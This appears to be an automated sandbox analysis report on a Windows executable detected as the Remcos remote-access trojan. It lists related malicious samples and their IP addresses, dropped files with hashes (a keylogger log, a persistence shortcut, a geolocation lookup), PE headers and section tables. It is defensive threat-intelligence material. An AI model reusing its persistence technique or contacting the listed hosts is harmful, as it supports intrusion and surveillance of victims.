                                                              • 178.237.33.50
                                                              2024_002930_24270100IM00003824_onyuz.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                              • 178.237.33.50
                                                              remcos.exeGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                                                              • 178.237.33.50
                                                              remcos.exeGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                                                              • 178.237.33.50
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              AS-COLOCROSSINGUSaowNKqhrAX.elfGet hashmaliciousMiraiBrowse
                                                              • 172.111.241.98
                                                              25094.xlsGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                              • 192.3.239.30
                                                              Pepsico LLC Company Profile.xlsGet hashmaliciousGuLoaderBrowse
                                                              • 192.3.64.142
                                                              Shipping Document.P.df.exeGet hashmaliciousPrivateLoader, RemcosBrowse
                                                              • 107.173.4.18
                                                              Swift_202411054785712.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                              • 23.94.54.101
                                                              Sales Agreement.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                              • 198.23.188.141
                                                              RFQ_83747384738757384754837483.xlsGet hashmaliciousRemcos, PrivateLoaderBrowse
                                                              • 107.173.4.16
                                                              TT Copy 103.xlsGet hashmaliciousUnknownBrowse
                                                              • 192.3.239.4
                                                              TT Copy 103.xlsGet hashmaliciousUnknownBrowse
                                                              • 192.3.239.4
                                                              RFQ 1305.2024.xlsGet hashmaliciousUnknownBrowse
                                                              • 172.245.123.8
                                                              ATOM86-ASATOM86NLShipping Document.P.df.exeGet hashmaliciousPrivateLoader, RemcosBrowse
                                                              • 178.237.33.50
                                                              RFQ_83747384738757384754837483.xlsGet hashmaliciousRemcos, PrivateLoaderBrowse
                                                              • 178.237.33.50
                                                              FOTO MULTA NACIONAL.vbsGet hashmaliciousRemcos, PrivateLoaderBrowse
                                                              • 178.237.33.50
                                                              Customer Ref-340000723012366.cmdGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                                                              • 178.237.33.50
                                                              PNX-SOA-0452-01073-2024.13.05-04-15-113108087979.cmdGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                                                              • 178.237.33.50
                                                              BenefitsRequest#241305.com.exeGet hashmaliciousRemcosBrowse
                                                              • 178.237.33.50
                                                              0093222024135.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                              • 178.237.33.50
                                                              2024_002930_24270100IM00003824_onyuz.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                              • 178.237.33.50
                                                              remcos.exeGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                                                              • 178.237.33.50
                                                              remcos.exeGet hashmaliciousRemcos, DBatLoader, PrivateLoaderBrowse
                                                              • 178.237.33.50
                                                              MICROSOFT-CORP-MSN-AS-BLOCKUSmessages undelivered.htm_Get hashmaliciousHTMLPhisherBrowse
                                                              • 13.107.213.41
                                                              https://sharepoint-0a17.dideto2686.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                                              • 13.107.213.41
                                                              https://preapi.tusegurocontodo.pe/Get hashmaliciousUnknownBrowse
                                                              • 13.107.213.57
                                                              https://pstscsecforesnec.centralindia.cloudapp.azure.com/?ID407064992940875410Get hashmaliciousHTMLPhisherBrowse
                                                              • 20.244.83.166
                                                              https://public-usa.mkt.dynamics.com/api/orgs/625487fa-5d11-ef11-9f83-0022480af135/r/BMfzuh0WNUqT1TFe57jpOgAAAAA?target=%7B%22TargetUrl%22%3A%22https%253A%252F%252Fclick.pstmrk.it%252F3s%252Ft.co%25252FNOcg8n1tnP%252FOwPK%252FmEu1AQ%252FAQ%252Faa7c1e48-00af-427f-a250-c2384a3aafff%252F1%252F0_nAxhax6e%2523_msdynmkt_donottrack%22%2C%22RedirectOptions%22%3A%7B%225%22%3Anull%2C%220%22%3Anull%7D%7D&digest=vcUl1BUbojOM1LRcdyw7%2FubPzi2KQv%2F0N9i6YbnPbR0%3D&secretVersion=a587597bbd2d4ba3bb4334f6d8be15eeGet hashmaliciousHTMLPhisherBrowse
                                                              • 52.146.76.30
                                                              https://www.shareholds.com/nam/015d9635-3549-4592-98af-02a619f71501/d5a41b7a-ee6a-4aa3-a0f4-2b17f43ec8fd/3d4ec201-d05d-471e-bafe-1176cd109982/login?id=L1p4RHV2WFRud3hwazc1M0tnSkVsN2IwM3E5VGFTVWw0bTBxemszMWswbDFEZ3A2NWFrNFpHRytqZnBXeXZUOGNpNFcrM21BVE5HdG9Tb0V0VmlLcXpZbXJsVEMyenRKK3ZKUVNReXNPQmIvbGNneStIT1h2UlhpeEJmZmpZTFFtVTRXRHNCRUYxR1AyTmhXcEJjUkNBWTcrSTVHTkVnMnhBNzNVNHhjUkNBcmtvZ3pKM1dWbW1wWTZwalJ2ZUtTQi96K21ENGhwYWZlcnE2amJiVk1SdjJEcXA2VnpyZW1saDVpQjRuUStuKzB5M2pnSnllb3k1cks4SlZkOWFacUw5dVd6U2xGZktRUmZoWkU3KzljdHBKUFB6Y1lKMkZiNnhBblQvU1hDVDU4SUhaOUdCVEtGMFVSdXR2VklhU3VQRDRJb0hsdGxMUG80Z1RCdDQ3WGs0N0h6d3UzTHJ6TzJ1cE5leFRucjhCMHVLa3VWTVF4cjQyQXFvc0gzSStsYVNCQko3bm9xWjl1RVdIZWRPN2hCdz09Get hashmaliciousUnknownBrowse
                                                              • 13.107.246.71
                                                              https://url2.mailanyone.net/scanner?d=4%7Cmail%2F90%2F1715596200%2F1s6T2F-0006Jp-4D%7Cin2m%7C57e1b682%7C17902772%7C12174482%7C6641ED0F70EB93309D580AF5B4F3AA64&m=1s6T2F-0006Jp-4D&o=%2Fpht1%3A%2Fwtslc-xartc.o2cre2m%2F0.o_54-11300-h--0m9.t50otl%3Fr_suum-acelrop%3Deibcyvehi.emm.cmut_o%26eueds%3Dnwimutlemr%26ttegm_c%3Dainaptsop-wen&s=IqM1Zc5GwuLm8yWijEEnkbPBHbwGet hashmaliciousHTMLPhisherBrowse
                                                              • 13.107.213.71
                                                              https://conta.cc/3JXNZaSGet hashmaliciousUnknownBrowse
                                                              • 13.107.213.71
                                                              https://url2.mailanyone.net/scanner?m=1s6pTH-0000Fr-6D&d=4%7Cmail%2F90%2F1715682600%2F1s6pTH-0000Fr-6D%7Cin2f%7C57e1b682%7C28613012%7C14303582%7C66433DF3D46FD0B9149B37AF26642EB9&o=%2Fphtu%3A%2Fptsacblmus.i-mdktcnai.ypos.%2F%2Faicm5sor35feg%2Fa-5ce90-285-f10f8-1963002105dab%2Fc%2FQn7UrkNU_s_0P8LqAhGaAAIAeQtaA%3F%25ge%3Dtrr27BeTag%252%25ltUA223r%25sh%2522tp%252tF%2553252%25A2ap52eopnFrbnmoleduudmsle2co%25t.2w522%252%25Fpi2C%25eedr2Rnpct%25iosOtB3222%257%25%25AA225u%253n%25222ll%25%2521%25Cl322%25nul%25Ai77De%26dg%25DwQst2aF%25%3Db6fBkf2LXU3hwBIL4xHiGTWDIqObb0zE5ov3Ct%25VGteD%26ereVsc5ors7%3Da8indb59bd247b4ba3633fb4ee51eb8d&s=9OHmoQ0JkwbsHuMKJ_DcFrbob0AGet hashmaliciousUnknownBrowse
                                                              • 52.146.76.30
                                                              https://sgpbioenergy-my.sharepoint.com/:u:/p/rdelbert/EYPL7JCPKcZHjisE2fncQt4BU_-rrhk008-dZ7fJDaA1Sg?xsdata=MDV8MDJ8bWljaGFlbC5tYXJ0dWNjaUBnbG9iYWxmb3VuZHJpZXMuY29tfDg0NTI0ZWEwZjQ3OTRlYTc2Nzg2MDhkYzc0MWZiOGY4fDAzOWY2ZDQ5NDNiYjRhNTNiMjk5NGZhMGM3ZmMyMjc2fDF8MHw2Mzg1MTI5MjcyMzE0NTU3NTZ8VW5rbm93bnxUV0ZwYkdac2IzZDhleUpXSWpvaU1DNHdMakF3TURBaUxDSlFJam9pVjJsdU16SWlMQ0pCVGlJNklrMWhhV3dpTENKWFZDSTZNbjA9fDQwMDAwfHx8&sdata=UXRWVUtMbmtxbG41Z1IzaTdLZTFzajRmL0crazN5YkdFNndwcmp3blF5UT0%3dGet hashmaliciousUnknownBrowse
                                                              • 13.107.136.10
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              a0e9f5d64349fb13191bc781f81f42e1SecuriteInfo.com.Win32.SpywareX-gen.6594.13084.exeGet hashmaliciousLummaCBrowse
                                                              • 13.107.139.11
                                                              BankPaymAdviceVend.Report.docxGet hashmaliciousUnknownBrowse
                                                              • 13.107.139.11
                                                              6YGziTTmDp.msiGet hashmaliciousPrivateLoader, VMdetectBrowse
                                                              • 13.107.139.11
                                                              MUlklsWPpT.msiGet hashmaliciousPrivateLoader, VMdetectBrowse
                                                              • 13.107.139.11
                                                              Swift_202411054785712.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                              • 13.107.139.11
                                                              Sales Agreement.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                              • 13.107.139.11
                                                              TT Copy 103.xlsGet hashmaliciousUnknownBrowse
                                                              • 13.107.139.11
                                                              PO-20240510.xla.xlsxGet hashmaliciousUnknownBrowse
                                                              • 13.107.139.11
                                                              RFQ 1305.2024.xlsGet hashmaliciousUnknownBrowse
                                                              • 13.107.139.11
                                                              Setup.exeGet hashmaliciousLummaCBrowse
                                                              • 13.107.139.11
                                                              No context
                                                              Process:C:\Windows\SysWOW64\SndVol.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):390
                                                              Entropy (8bit):3.40380415482186
                                                              Encrypted:false
                                                              SSDEEP:6:6lx25YcIeeDAl2i63141gWAVl+Sk897+SGPWAGfE/OSFWAv:6lcec8/3FWQwoKtPWa/OSFW+
                                                              MD5:A6F96A93396CABC5227503BABE425936
                                                              SHA1:66C30D4BB88E99E0CD4C76B25E7890C10269CCF1
                                                              SHA-256:DDA674E815D8674712AD0D97A2067D8ADEF996FCD60D669EA815CF4F9014D3ED
                                                              SHA-512:6FE586F108CAC1DF62E023CAFECE783167296921C6F9BD7ACC5308846E4922B08C07260C009956CA4FEA407478F9C05001B4055A1D750DF94B3E86B0E6C8B2F7
                                                              Malicious:true
                                                              Yara Hits:
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                              Reputation:low
                                                              Preview:....[.2.0.2.4./.0.5./.1.5. .0.1.:.5.6.:.5.1. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.V.o.l.u.m.e. .M.i.x.e.r.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.W.i.n.d.o.w.s. .V.o.l.u.m.e. .A.p.p. .W.i.n.d.o.w.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.C.o.l.o.u.r. .M.a.n.a.g.e.m.e.n.t.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                              Process:C:\Users\user\Desktop\HGTQP09643009.scr.exe
                                                              File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Jsqwmpul.PIF">), ASCII text, with CRLF line terminators
                                                              Category:dropped
                                                              Size (bytes):100
                                                              Entropy (8bit):5.117404160633784
                                                              Encrypted:false
                                                              SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMq4Ssb9Z1K9u:HRYFVmTWDyzpE9+9u
                                                              MD5:BBC6DF08BD677692AB53CC8C852EC3A6
                                                              SHA1:30160B114BBA37AD1FF39A3D22A911C88A249D07
                                                              SHA-256:F8F748EB96280920BCA6A84291A701C30AAEFE5EF65A07B3A940694A0B79413C
                                                              SHA-512:B30FD38145E09C8A3C0C81C03836F6450D03C4BA01FE914B5CA89E6BEAC7ADD0B14CC4DC97512DE5520903735DBE8FA15CFA31208F06F9B67BC749173BBEE325
                                                              Malicious:true
                                                              Reputation:low
                                                              Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Jsqwmpul.PIF"..IconIndex=59..HotKey=33..
                                                              Process:C:\Windows\SysWOW64\extrac32.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):1103360
                                                              Entropy (8bit):6.195563708800626
                                                              Encrypted:false
                                                              SSDEEP:24576:CA0ReRHP4+ngiPzZPQgBt9o/1bIhTmOLm:CUd+gBWbIhaOK
                                                              MD5:C8B0899DD51C7516316ED413771E71C4
                                                              SHA1:E9E407A9A7F7655940B1A7B48AC02B740D004004
                                                              SHA-256:841200C9E115B489ADB33D27E4FCD1F6769609E5C378A45EF1D371200BD9A41C
                                                              SHA-512:B2EB32CAB1CFF714502B20D7BAA1297A55D9107A683260E799FEC99A485758D039989407D169A5843CC3ABA65F9D0C9B737BD33BE35DFFD266B8DAFF0CF8B0D8
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 61%
                                                              • Antivirus: Virustotal, Detection: 60%, Browse
                                                              Reputation:low
                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................N...................@..........................p...................@...............................$...`..........................,c..................................................................................text....E.......F.................. ..`.itext..0<...`...>...J.............. ..`.data..............................@....bss.....6...`.......H...................idata...$.......&...H..............@....tls....4............n...................rdata...............n..............@..@.reloc..,c.......d...p..............@..B.rsrc........`......................@..@.............p......................@..@................................................................................................
                                                              Process:C:\Windows\SysWOW64\SndVol.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):958
                                                              Entropy (8bit):5.0050251642019985
                                                              Encrypted:false
                                                              SSDEEP:12:tklU+nd6CsGkMyGWKyGXPVGArwY3TogmayHnmGcArpv/mOAaNO+ao9W7iN5zzkwS:ql1dRNuKyGX85JvXhNlT3/7SxDWro
                                                              MD5:9EF6453C92B223F1C95FDADE1CAC068E
                                                              SHA1:D2207DB852F363214C84E3EA3614916B401A16C3
                                                              SHA-256:DE8F614AB297124D15A5575F01625D0012870A8D01EBB07C6BF14CB11A28D6D0
                                                              SHA-512:5BAC6658E9608E3B69B5980447548D87F2C0639D2F20A24A3C342F2403B89417BBF5D9F085AEF6D24429B397FA0780721584A60510D77803E03D2B4124274F4E
                                                              Malicious:false
                                                              Preview:{. "geoplugin_request":"84.17.40.102",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Miami",. "geoplugin_region":"Florida",. "geoplugin_regionCode":"FL",. "geoplugin_regionName":"Florida",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"528",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"25.7689",. "geoplugin_longitude":"-80.1946",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                              Process:C:\Windows\SysWOW64\SndVol.exe
                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0xbe5945cb, page size 32768, DirtyShutdown, Windows version 10.0
                                                              Category:dropped
                                                              Size (bytes):17301504
                                                              Entropy (8bit):0.8011984777830636
                                                              Encrypted:false
                                                              SSDEEP:6144:ydfjZb5aXEY2waXEY24URlMe4APXAP5APzAPwbndOO8pHAP6JnTJnTbnSotnBQ+z:AVS4e81ySaKKjLrONseWe
                                                              MD5:8E4478CDED0B4536038EE91DA4F0F04E
                                                              SHA1:6788B3974B64B70609E8C78640FDD4C018F9C42C
                                                              SHA-256:6C46A7D0369844731CDCFD7414585D5463C45ECD88ED6A5316C347D506C9C041
                                                              SHA-512:975856F2B892F06AB39D6FB9CCF12DCB9089837B20F7A09BF9C54E544A25CC67E810AAC1B10E718A4E4705B30C7BECA13AB60682B2D9946CB6365EEF646422D9
                                                              Malicious:false
                                                              Preview:.YE.... .......;!......E{ow("...{........................@.....,....{..$8...|..h.B............................("...{q............................................................................................._...........eJ......n........................................................................................................... ............{...................................................................................................................................................................................................{]..................................o..$8...|..................%...$8...|...........................#......h.B.....................................................................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\SysWOW64\SndVol.exe
                                                              File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):2
                                                              Entropy (8bit):1.0
                                                              Encrypted:false
                                                              SSDEEP:3:Qn:Qn
                                                              MD5:F3B25701FE362EC84616A93A45CE9998
                                                              SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                              SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                              SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                              Malicious:false
                                                              Preview:..
                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Entropy (8bit):6.195563708800626
                                                              TrID:
                                                              • Win32 Executable (generic) a (10002005/4) 99.81%
                                                              • Windows Screen Saver (13104/52) 0.13%
                                                              • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                              • DOS Executable Generic (2002/1) 0.02%
                                                              File name:HGTQP09643009.scr.exe
                                                              File size:1'103'360 bytes
                                                              MD5:c8b0899dd51c7516316ed413771e71c4
                                                              SHA1:e9e407a9a7f7655940b1a7b48ac02b740d004004
                                                              SHA256:841200c9e115b489adb33d27e4fcd1f6769609e5c378a45ef1d371200bd9a41c
                                                              SHA512:b2eb32cab1cff714502b20d7baa1297a55d9107a683260e799fec99a485758d039989407d169a5843cc3aba65f9d0c9b737bd33be35dffd266b8daff0cf8b0d8
                                                              SSDEEP:24576:CA0ReRHP4+ngiPzZPQgBt9o/1bIhTmOLm:CUd+gBWbIhaOK
                                                              TLSH:01356C8376A044A1D5A3193C540D4F8E6E5C7E59A604A9FF53E97CBCAB38BC2D0BC05B
                                                              File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                              Icon Hash:1872d8c4dcdccedc
                                                              Entrypoint:0x459be8
                                                              Entrypoint Section:.itext
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                              DLL Characteristics:
                                                              Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:4
                                                              OS Version Minor:0
                                                              File Version Major:4
                                                              File Version Minor:0
                                                              Subsystem Version Major:4
                                                              Subsystem Version Minor:0
                                                              Import Hash:439f1eee1816d6c8dbeb810c2f569ded
                                                              Instruction
                                                              push ebp
                                                              mov ebp, esp
                                                              add esp, FFFFFFF0h
                                                              mov eax, 00455390h
                                                              call 00007EFC30FD3215h
                                                              mov eax, dword ptr [004F5D60h]
                                                              mov eax, dword ptr [eax]
                                                              call 00007EFC3101EAC9h
                                                              mov ecx, dword ptr [004F5E50h]
                                                              mov eax, dword ptr [004F5D60h]
                                                              mov eax, dword ptr [eax]
                                                              mov edx, dword ptr [00455188h]
                                                              call 00007EFC3101EAC9h
                                                              mov eax, dword ptr [004F5D60h]
                                                              mov eax, dword ptr [eax]
                                                              call 00007EFC3101EB3Dh
                                                              call 00007EFC30FD1290h
                                                              lea eax, dword ptr [eax+00h]
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              add byte ptr [eax], al
                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xfa0000x24c2.idata
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1060000x10200.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0xff0000x632c.reloc
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0xfe0000x18.rdata
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0xfa6d40x5bc.idata
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x10000x545d00x54600f2869d94df0bc4b5c9f68cbe21100a36False0.533449074074074data6.552245149979875IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              .itext0x560000x3c300x3e009969142d79755c5d4c986dc0d53a2b1fFalse0.3204385080645161data5.3862884705690455IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              .data0x5a0000x9bee80x9c0000fca2d995f5345fc497063415f1ff162False0.2847086588541667data4.854723643620289IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .bss0xf60000x36d80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .idata0xfa0000x24c20x26003202feb204b7063cadb7acc0cc7d190dFalse0.3157894736842105data5.103212972887659IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .tls0xfd0000x340x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .rdata0xfe0000x180x20016238ec10a9dfd02293517ab322daca9False0.05078125data0.2108262677871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .reloc0xff0000x632c0x6400b05e294ce63e667f2d2ba03a4de4ef1fFalse0.6606640625data6.694570612418228IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                              .rsrc0x1060000x102000x10200ad69ddcd7af50804b96e5839c1f0fb1dFalse0.291999757751938data5.524860232359683IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                              RT_CURSOR0x106dc00x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                              RT_CURSOR0x106ef40x134dataEnglishUnited States0.4642857142857143
                                                              RT_CURSOR0x1070280x134dataEnglishUnited States0.4805194805194805
                                                              RT_CURSOR0x10715c0x134dataEnglishUnited States0.38311688311688313
                                                              RT_CURSOR0x1072900x134dataEnglishUnited States0.36038961038961037
                                                              RT_CURSOR0x1073c40x134dataEnglishUnited States0.4090909090909091
                                                              RT_CURSOR0x1074f80x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                              RT_BITMAP0x10762c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                              RT_BITMAP0x1077fc0x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
                                                              RT_BITMAP0x1079e00x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                              RT_BITMAP0x107bb00x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
                                                              RT_BITMAP0x107d800x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
                                                              RT_BITMAP0x107f500x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                                                              RT_BITMAP0x1081200x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
                                                              RT_BITMAP0x1082f00x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                              RT_BITMAP0x1084c00x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
                                                              RT_BITMAP0x1086900x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                              RT_BITMAP0x1088600xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.5208333333333334
                                                              RT_BITMAP0x1089200xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.42857142857142855
                                                              RT_BITMAP0x108a000xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.4955357142857143
                                                              RT_BITMAP0x108ae00xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.38392857142857145
                                                              RT_BITMAP0x108bc00xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.4947916666666667
                                                              RT_BITMAP0x108c800xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.484375
                                                              RT_BITMAP0x108d400xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.42410714285714285
                                                              RT_BITMAP0x108e200xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.5104166666666666
                                                              RT_BITMAP0x108ee00xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.5
                                                              RT_BITMAP0x108fc00xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.4870689655172414
                                                              RT_BITMAP0x1090a80xc0Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colorsEnglishUnited States0.4895833333333333
                                                              RT_BITMAP0x1091680xe0Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colorsEnglishUnited States0.3794642857142857
                                                              RT_ICON0x1092480x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m0.48592870544090055
                                                              RT_ICON0x10a2f00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 3779 x 3779 px/m0.2872579121398205
                                                              RT_ICON0x10e5180x5488Device independent bitmap graphic, 72 x 144 x 32, image size 20736, resolution 3779 x 3779 px/m0.25235674676524955
                                                              RT_DIALOG0x1139a00x52data0.7682926829268293
                                                              RT_DIALOG0x1139f40x52data0.7560975609756098
                                                              RT_STRING0x113a480x34data0.5
                                                              RT_STRING0x113a7c0x2b0data0.4752906976744186
